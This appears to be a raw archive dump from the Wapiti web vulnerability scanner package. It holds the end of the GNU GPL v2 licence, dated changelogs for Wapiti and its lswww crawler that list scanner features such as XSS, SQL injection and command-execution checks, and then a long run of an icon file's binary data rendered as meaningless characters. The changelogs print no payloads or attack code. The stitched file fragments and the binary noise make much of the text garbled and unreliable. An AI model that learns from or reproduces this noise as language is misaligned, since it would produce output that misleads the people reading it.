refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. wapiti-2.3.0+dfsg/doc/ChangeLog_Wapiti000066400000000000000000000203641240201516300175630ustar00rootroot0000000000000020/10/2013 Version 2.3.0 Fixed a colosseum of bugs, especially related to unicode. Software is much more stable. New report template for HTML (using Kube CSS). Using v2.1.5 of Nikto database for mod_nikto. Replaced httplib2 with (python-)requests for everything related to HTTP. Remove BeautifulSoup from package. It is still required however. Core rewrite (PEP8 + more Pythonic) New payloads for the backup, XSS, blind SQL, exec and file modules + more detection rules. So many improvements on lswww (crawler) that I can't make a list here. But Wapiti reached 48% on Wivet. Wapiti cookie format is now based on JSON. Removed SOCKS proxy support (you will have to use a HTTP to SOCKS proxy). Added a HTTPResource class for easier module creation. Code restructuration for better setup. Attack of parameters in query string even for HTTP POST requests. Attack on file uploads (injection in file names). Simpler (and less buggy) colored output with -c. A CURL PoC is given for each vulnerability/anomaly found + raw HTTP request representation in reports. No more parameter reordering + can handle parameters repetition. Added a JSON report generator + fixed the HTML report generator. Added an option to not check SSL certificates. mod_xss : noscipt tag escaping. Can work on parameters that don't have a value in query string. mod_crlf is not activated by default anymore (must call it with -m). Startings URLs (-s) will be fetched even if out of scope. Proxy support for wapiti-getcookie. and wapiti-cookie. Attempt to bring an OpenVAS report generator. Added an home-made SWF parser to extract URLs from flash files. Added an home-made (and more than basic) JS interpreter based on the pynarcissus parser. Lot of work still needs to be done on this. New logo and webpage at wapiti.sf.net. Added german and malaysian translations. Added a script to create standalone archive for Windows (with py2exe). 29/12/2009 Version 2.2.1 (already) Bugfixes only Fixed a bug in lswww if root url is not given complete. Fixed a bug in lswww with a call to BeautifulSoup made on non text files. Fixed a bug that occured when verbosity = 2. Unicode error on stderr. Check the document's content-type and extension before attacking files on the query string. Added a timeout check in the nikto module when downloading the database. 28/12/2009 Version 2.2.0 Added a manpage. Internationalization : translations of Wapiti in spanish and french. Options -k and -i allow the scan to be saved and restored later. Added option -b to set the scope of the scan based on the root url given. Wrote a library to save handle cookies and save them in XML format. Modules are now loaded dynamically with a dependency system. Rewrote the -m option used to activate / deactivate attack modules. New module to search for backup files of scripts on the target webserver. New module to search for weakly configured .htaccess. New module to search dangerous files based on the Nikto database. Differ "raw" XSS from "urlencoded" XSS. Updated BeautifulSoup to version 3.0.8. Better encoding support for webpages (convert to Unicode) Added "resource consumption" as a vulnerability type. Fixed bug ID 2779441 "Python Version 2.5 required?" Fixed bug with special characters in HTML reports. 05/04/2008 Added more patterns for file handling vulnerabilities in PHP. Added GET_SQL and POST_SQL as modules (-m) for attacks. Modifier getcookie.py and cookie.py so they try to get the cookies even if cookielib fails. 27/03/2007 Updated ChangeLogs 26/03/2009 Fixed bug ID 2433127. Comparison was made with HTTP error codes on numeric values but httplib2 return the status code as a string. Forbid httplib2 to handle HTTP redirections. Wapiti and lswww will take care of this (more checks on urls...) Fixed a bug with Blind SQL attacks (the same attack could be launched several times) Fixed an error in blindSQLPayloads.txt. Changed the error message when Wapiti don't get any data from lswww. Verifications to be sure blind SQL attacks won't be launched if "standard" SQL attacks works. 25/03/2009 Exported blind SQL payloads from the code. Now in config file blindSQLPayloads.txt. Set timeout for time-based BSQL attacks to timetout used for HTTP requests + 1 second. Added Blind SQL as a type of vulnerability in the report generator. More verbosity for permanent XSS scan. More docstrings. Updated the REAME. 24/03/2009 Added some docstring to the code. Removed warnign on alpha code. First Blind SQL Injection implementation in Wapiti. Fixed some timeout errors. 22/03/2009 Fixed character encoding error in sql injection module. Changed the md5 and sha1 import in httplib2 to hashlib. 28/11/2008 Google Charts API is added to generate the charts of the reports. 15/11/2008 Re-integration of standard HTTP proxies in httplib2. Integration of HTTP CONNECT tunneling in Wapiti. Fixed bug ID 2257654 "getcookie.py error missing action in html form" 02/11/2008 Integraded the proxy implementation of httplib2 in Wapiti. Can now use SOCKSv5 and SOCKSv4 proxies. 22/10/2008 Fixed a bug with Cookie headers. 19/10/2008 Remplaced urllib2 by httplib2. Wapiti now use persistent HTTP connections, speed up the scan. Included a python SOCKS library. 09/10/2008 Version 2.0.0-beta Added the possibility to generate reports of the vulnerabilities found in HTML, XML or plain-text format. See options -o and -f. HTTP authentification now works. Added the option -n (or --nice) to prevent endless loops during scanning. More patterns for SQL vulnerability detection Code refactoring : more clear and more object-oriented New XSS function is now fully implemented The payloads have been separated from the code into configuration files. Updated BeautifulSoup 15/09/2008 Version 1.1.7-alpha Use GET method if not specified in "method" tag Keep an history of XSS payloads New XSS engine for GET method using a list of payloads to bypass filters New module HTTP.py for http requests Added fpassthru to file handling warnings Added a new new detection string for MS-SQL, submitted by Joe McCray 28/01/2007 Version 1.1.6 New version of lswww 24/10/2006 Version 1.1.5 Wildcard exclusion with -x (--exclude) option 22/10/2006 Fixed a typo in wapiti.py (setAuthCreddentials : one 'd' is enough) Fixed a bug with setAuthCredentials. 07/10/2006 Version 1.1.4 Some modifications have been made on getccokie.py so it can work on Webmin (and probably more web applications) Added -t (--timeout) option to set the timeout in seconds Added -v (--verbose) option to set the verbosity. Three availables modes : 0: only print found vulnerabilities 1: print current attacked urls (existing urls) 2: print every attack payload and url (very much informations... good for debugging) Wapiti is much more modular and comes with some functions to set scan and attack options... look the code ;) Some defaults options are availables as "modules" with option -m (--module) : GET_XSS: only scan for XSS with HTTP GET method (no post) POST_XSS: XSS attacks using POST and not GET GET_ALL: every attack without POST requests 12/08/2006 Version 1.1.3 Fixed the timeout bug with chunked responses (ID = 1536565 on SourceForge) 09/08/2006 Version 1.1.2 Fixed a bug with HTTP 500 and POST attacks 05/08/2006 Version 1.1.1 Fixed the UnboundLocalError due to socket timeouts (bug ID = 1534415 on SourceForge) 27/07/2006 Version 1.1.0 with urllib2 Detection string for mysql_error() Changed the mysql payload (see http://shiflett.org/archive/184 ) Modification of the README file 22/07/2006 Added CRLF Injection. 20/07/2006 Added LDAP Injection and Command Execution (eval, system, passthru...) 11/07/2006 -r (--remove) option to remove parameters from URLs Support for Basic HTTP Auth added but don't work with Python 2.4. Proxy support. Now use cookie files (option "-c file" or "--cookie file") -u (--underline) option to highlight vulnerable parameter in URL Detect more vulnerabilities. 04/07/2006: Now attacks scripts using QUERY_STRING as a parameter (i.e. http://server/script?attackme) 23/06/2006: Version 1.0.1 Can now use cookies !! (use -c var=data or --cookie var=data) Two utilities added : getcookie.py (interactive) and cookie.py (command line) to get a cookie. Now on Sourceforge 25/04/2006: Version 1.0.0 wapiti-2.3.0+dfsg/doc/ChangeLog_lswww000066400000000000000000000121531240201516300175060ustar00rootroot0000000000000029/12/2009 Version 2.3.1 Fixed a bug in lswww if root url is not given complete. Fixed a bug in lswww with a call to BeautifulSoup made on non text files. Fixed a bug that occured when verbosity = 2. Unicode error on stderr. 27/12/2009 Version 2.3.0 Internationalization and translation to english and spanish when called from Wapiti. Ability to save a scan session and restore it later (-i) Added option -b to set the scope of the scan based on the root url given as argument. Fixed bug ID 2779441 "Python Version 2.5 required?" Use an home made cookie library instead or urllib2's one. Keep aditionnal informations on the webpages (headers + encoding) Use BeautifulSoup to detect webpage encoding and handle parsing errors. Fixed a bug when "a href" or "form action" have an empty string as value. Better support of Unicode. 26/03/2009 Version 2.2.0 Fixed bug ID 2433127 with HTTP 404 error codes. Don't let httplib2 manage HTTP redirections : return the status code and let lswww handle the new url. 25/03/2009 Version 2.1.9 Added option -e (or --export) Saves urls and forms data to a XML file. We hope other fuzzers will allow importation of this file. 24/03/2009 More verifications on timeout errors. 22/03/2009 Version 2.1.8 Fixed bug ID: 2415094 Check on protocol found in hyperlinks was case-sentitive. Moved it to non-case-sensitive. Integration of a second linkParser class called linkParser2 from lswwwv2.py. This parser use only regexp to extract links and forms. 25/11/2008 httplib2 use lowercase names for the HTTP headers in opposition to urllib2 (first letter was uppercase). Changed the verifications on headers. 15/11/2008 Fixed a bug with links going to parrent directory. 02/11/2008 Better integration of proxy support provided by httplib2. It's now possible to use SOCKS proxies. 19/10/2008 Version 2.1.7 Now use httplib2 (http://code.google.com/p/httplib2/)n MIT licence instead of urllib2. The ability to use persistents connections makes the scan faster. 09/10/2008 Version 2.1.6 HTTP authentification now works Added the option -n (or --nice) to prevent endless loops during scanning 28/01/2007 Version 2.1.5 First take a look at the Content-Type instead of the document extension Added BeautifulSoup as an optionnal module to correct bad html documents (better use tidy if you can) 24/10/2006 Version 2.1.4 Wildcard exclusion with -x (--exclude) option 22/10/2006 Fixed an error with url parameters handling that appeared in precedent version. Fixed a typo in lswww.py (setAuthCreddentials : one 'd' is enough) 07/10/2006 Version 2.1.3 Three verbose mode with -v (--verbose) option 0: print only results 1: print dots for each page accessed (default mode) 2: print each found url durring scan Timeout in seconds can be set with -t (--timeout) option Fixed bug "crash when no content-type is returned" Fixed an error with 404 webpages Fixed a bug when the only parameter of an url is a forbidden one 09/08/2006 Version 2.1.2 Fixed a bug with regular expressions 05/08/2006 Version 2.1.1 Remove redundant slashes from urls (e.g. http://server/dir//page.php converted to http://server/dir/page.php) 20/07/2006 Version 2.1.0 with urllib2 11/07/2006 -r (--remove) option to remove parameters from URLs Generate URL with GET forms instead of using POST by default Support for Basic HTTP Auth added but don't work with Python 2.4. Now use cookie files (option "-c file" or "--cookie file") Extracts links from Location header fields 06/07/2006 Extract links from "Location:" headers (HTTP 301 and 302) Default type for "input" elements is set to "text" (as written in the HTML 4.0 specifications) Added "search" in input types (created for Safari browsers) 04/07/2006 Fixed a bug with empty parameters tuples (convert http://server/page?&a=2 to http://server/page?a=2) 23/06/2006 Version 2.0.1 Take care of the "submit" type No extra data sent when a page contains several forms Corrected a bug with urls finishing by '?' Support Cookies !! 25/04/2006 Version 2.0 Extraction des formulaires sous la forme d'une liste de tuples contenant chacun un string (url du script cible) et un dict contenant les noms des champs et leur valeur par dfaut (ou 'true' si vide) Recense les scripts gerant l'upload Peut maintenant fonctionner comme module 19/04/2006 Version 1.1 Lecture des tags insensible a la casse Gestion du Ctrl+C pour interrompre proprement le programme Extraction des urls dans les balises form (action) 12/10/2005 Version 1.0 Gestion des liens syntaxiquement valides mais pointant vers des ressources inexistantes (404) 11/09/2005 Beta4 Utilisation du module getopt qui permet de specifier facilement les urls a visiter en premier, les urls a exclure (nouveau !) ou encore le proxy a utiliser 24/08/2005 Beta3 Ajout d'un timeout pour la lecture des pages pour ne pas bloquer sur un script bugge 23/08/2005 Version beta2 Prise en charge des indexs generes par Apache Filtre sur les protocoles Gestion des liens qui remontent l'arborescence Gestion des liens vides 02/08/2005 Sortie de la beta1 wapiti-2.3.0+dfsg/doc/cookie.ico000066400000000000000000013226261240201516300164500ustar00rootroot00000000000000 hf 00 %v@@ (B; (F} ( n(  @) %  Us#H#Dv"F}(G m !9,Z,Z2"=c;o * Cw%L,Z,Z!Dz*W4  .6`2T)U#>)U,Z'Q)U!Cx G/T+Y+X)S.N+W,Z$<+M@r3)I,Y,Z,Z'P!<+W)U8b8d/ %M&M#F{&N4(S,Z&C-N3[ Cw)J,Z,Z,Z,Z#I O'F'O$@%L)U:h a?/}6uC( @ GM=%M$@ #k@s'P)A5Z Cw"< . 1Ou_6`,Z+Y+Y,Z+Y%M&C %9"Ez,Z,Z,Z,Z"E{ 8yi%8`,Z,Z,Z,Z4  @q - mI a">>o+L'Q,Z,Z,Z,Z7a'F+Y'O %q  Bv'P,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z"F} -Y #;i # 1W,Z,Z#H At+Y,Z,Z,Z,Z,Z,Z,Z,Z'Fs5^,Z0U*@a%L,Z#I#H,Z,Z,Z*W8c#G,Z,Z3[ >n,Z+Y)U,Z,Z At$7S(Q,Z,Z,Z!>j (R,Z.Ru )U,Z,Z,Z,Z,Z+Yh 1 -Q,Z+Y*E 3!Ez,Z*V)I'Eq+X,Z,Z,Z"E|-P9fS /*V+X (H,Z,Z,Z,Z,Z,Z,Z,Z,Z+Xo;j+Y'P1W%M,Z,Z,Z,Z,Z,Z,Z,Z*V 1Ms -$K,Z,Z!Cx1W)T,Z,Z,Z,Z(R #E2Y+X')I,Z+X#I5_ KG  +@ *'E A (0` %WaAQm !Cx+M"="=5kok.R+Z"E{ ;X(H Bv7 1"= =m,Z,Z%L.S*V,Z*W9e'F7 CMq ,+Y+Y+Y+Y+Y+Y+Y+Y+Y(R"=7+X,Y+Z,Y,Y+Z,Y+Y(H&E41  7';j,Z,Z,Z,Z,Z,Z?q"<5 (!9;#3!2=l+Y+Y+Y+Y+Y+Y(G ?o!Dz $yu@r!< +L+Y,Y+Z,Z,Y+Z,Zo,Z,Z,Z,Z+Z,Z,Z+Z,Z,Z+Z!Dy "=+Y+Z,Z,Z,Z,Z'Q47&N+Y " *+Y+Y+Y,Y+Y+Y,Y+Y+Y,Y+Y ."G+Y+Y+Y+Y+Y!;8S}-+X c #'P+Y,Z,Y+Z,Z,Y+Z,Z,Y+Z % 2Z+Z,Z+Z,Z,Z*?_!4O*V  $?p,Z,Z,Z+Y At7b'O,Z,Z+Z:h &6O!Ez+Z,Z,Z,Z,Z+L3Y1Wc *$K+Y,Y6`(<,B 'Q,Y+Y+Y At#?j$H,Y+Y+Y+Y+Y+Y+Y Cw"G~%M% *6a,Z,Y,O;i,Y+Z,Y,Y+Z,Y,Y+Z,Y+Y,Z+Z+Y,Z+Z"=n+Y+Z+Y%L%L,Z,Z+Z,Z,Z+Z,Z,Z+Z,Z,Z,Z,Z,Z4]?5 (#I,Y,Y+Z,Y+Y$K$K,Y+Z,Y,Y+Z,Y+Y,Z+Y+L/U(G*W+Y,Y 2-P+Y,Y+Y+Y,Y+Y(R4- #I,Z 0H +Z,Z+Y&O;i+M 9G/Fi#4M (>n9e4 5%]{ka_?(@ B'gcqYu}a1  EG!?p,Z 12Y5_ U O%o 0,Z,Z5_:V#4N/T"E| 0%C%B8GUQ!3[,Z,Z+Y7a$.)T,Z'Q1W  +-Q 2 G'F,Z,Z,Z,Z*V+Y,Z,Z,Z,Z*V%M3Z  % 9 cK)T,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z)T$@)I7w $J,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z'P $'F ' 2m'*V,Z,Z,Z,Z,Z,Z,Z,Z+Y !2Y :!;)' /G"F~,Z,Z,Z,Z,Z,Z,Z,Z Bv .'Q!;=C;E '(R,Z,Z,Z,Z,Z,Z,Z,Z4]+:f,Z*L  .uy)} 0!Cx  8d,Z,Z,Z,Z,Z,Z,Z,Z,Z"F} ++Y,Z+Y0V ! =#;i3[+X*W%L(S,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y;i0U*V,Z,Z,Z+Y"< w/=5Y $@6a$I Bv,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+X ) $7'E)U,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z'P 'E 95  +Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z ,*J '*K+Y$K2Y-D*V,Z,Z,Z,Z$J"=72Y+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z&D5^ ! '$J,Z,Z$I Hk&C,Z,Z,Z,Z%M =l,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*J0U1 ,+Y,Z,Z+Y 10Hk)Dn*W,Z,Z,Z,Z$@ 0V,Z,Z,Z,Z,Z,Z,Z,Z'Q!; 3&N,Z,Z,Z,Z Cw0U ! 0+Y,Z,Z,Z*W$H+Y,Z,Z,Z,Z,Z .>]n,Z,Z,Z3[ } #I,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y1W  ,%L,Z,Z,Z,Z,Z,Z,Z,Z'P+@` Bu,Z,Z+Y #> ,,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*K &+X,Z,Z,Z0U6U ,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z!Dz*L9f*W,Z,Z,Z,Z!E{ $K+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*V.R # 0%L,Z,Z,Z,Z,Z,Z,Z,Z,Z'Q>n$K,Z,Z Bv85^,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z6 *W,Z,Z,Z,Z,Z,Z,Z'P  ,O,Z=n!< !,Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+X;j,Z,Z,Z,Z,Z,Z,Z%B R{ &N;i w6&N,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z)T&D,Z,Z,Z,Z,Z,Z,Z $Ef(;X Bv@s{ +!Dy,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y $)9R)I,Z,Z,Z,Z,Z,Z,Z3 '<)T8y +5+X,Z,Z,Z,Z"F|)C"5S!9&O,Z,Z,Z,Z%K  2Gg"4P(R,Z,Z,Z,Z,Z,Z,Z'Q  @r Cw /7!<,Z,Z,Z*V (<$ +Y,Z,Z,Z,Z)U=l?q*W,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y(Q+Y*W kC  8(R,Z,Z)T'O,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z5_/U)T,Z,Z,Z$@(R,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z)U -%M,Z,Z,Z+Y4]'F,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z'Q =n+Y,Z,Z,Z,Z+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z$J / '#H,Z,Z,Z,Z,Z,Z,Z,Z+Y+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z!Dy /$@)T,Z,Z,Z,Z!Ez '  Cw,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y;i9  Cw,Z,Z,Z )U,Z,Z,Z,Z,Z,Z,Z&M4+L)U,Z &*>]#$K,Z,Z+Y)S Cw-P5)E 15,BRy(< (S'Q%L-P ) ' * 'E i   ( += SK) MUM{ImkW=  *K1W # (QM%3 %L+Y,Z:h '+Y:hOMK$I,Z,Z,Z4\*W%M#G'F y M(G,Z,Z,Z,Z%L)>Im9U)U*W #3?p#H At5^ 2s%G3"F|,Z,Z,Z,Z,Z.S#5O^Qy+Y,Z'P 5_(R+MO+X,Z,Z,Z,Z,Z+Y3[.Df,!E{,Z,Z,Z+X9f ) $At'Q'Eo %,Z,Z,Z,Z,Z,Z,Z,Z%L .!Dy,Z,Z,Z,Z,Z,Z+Y'Q,N  2Y!Dz+L O/5 +Y,Z,Z,Z,Z,Z,Z,Z,Z,Z%L*V,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z%M/U(R$@ $@2Y.R w7a,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*V,Z,Z%L 2:h *; +Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y"E{ & At !a Au,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z+Y%M.S!E{#e77-Q+Y,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z At&C2Y#?*JgW4*W,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z3["G4\!Cx %C,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z?q'F*V ,,N':W&M,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z*W  ',Y &>o qwAAa5_,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z9f #,Z:h )/U;3q Aa1W,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z4(<*?)J,Z+X >n +!;c 1In>o,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,Z,ZCc 'P,Z,Z4\ Bv 